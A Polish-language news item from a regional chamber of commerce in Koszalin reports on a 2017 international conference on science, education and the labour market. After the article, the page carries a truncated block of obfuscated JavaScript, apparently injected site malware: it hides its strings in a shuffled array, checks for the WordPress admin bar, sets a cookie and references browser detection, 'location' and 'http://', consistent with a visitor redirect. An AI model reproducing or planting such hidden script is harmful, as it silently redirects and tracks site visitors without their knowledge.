Międzynarodowa konferencja NAUKA- EDUKACJA- RYNEK PRACY | Północna Izba Gospodarcza w Koszalinie

Koszalin, 27 kwietnia 2017r.

Międzynarodowa konferencja NAUKA- EDUKACJA- RYNEK PRACY z udziałem Przedstawicieli Północnej Izby Gospodarczej.

W dniu 25 kwietnia br. w Auli Głównej Politechniki Koszalińskiej odbył się pierwszy dzień II Międzynarodowej Konferencji Naukowej z cyklu: NAUKA- EDUKACJA- RYNEK PRACY na temat: “INTERDYSCYPLINARNE ASPEKTY FUNKCJONOWANIA CZŁOWIEKA WSPÓŁCZESNEJ CYWILIZACJI”. Do działu w debacie na temat realnych potrzeb współczesnego rynku pracy oraz sytuacji pracujących na tym rynku a także poszukujących pracy z udziałem przedstawiciela WUP, PIP, ZUS, Prezydenta Koszalina i Naukowców, zaproszeni zostali przedstawiciele Północnej Izby Gospodarczej. Reprezentujący lokalnych przedsiębiorców i Oddział PIG w Koszalinie Pan Robert Bodendorf oraz Prezes Północnej Izby Gospodarczej  Pan Dariusz Więcaszek.

 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m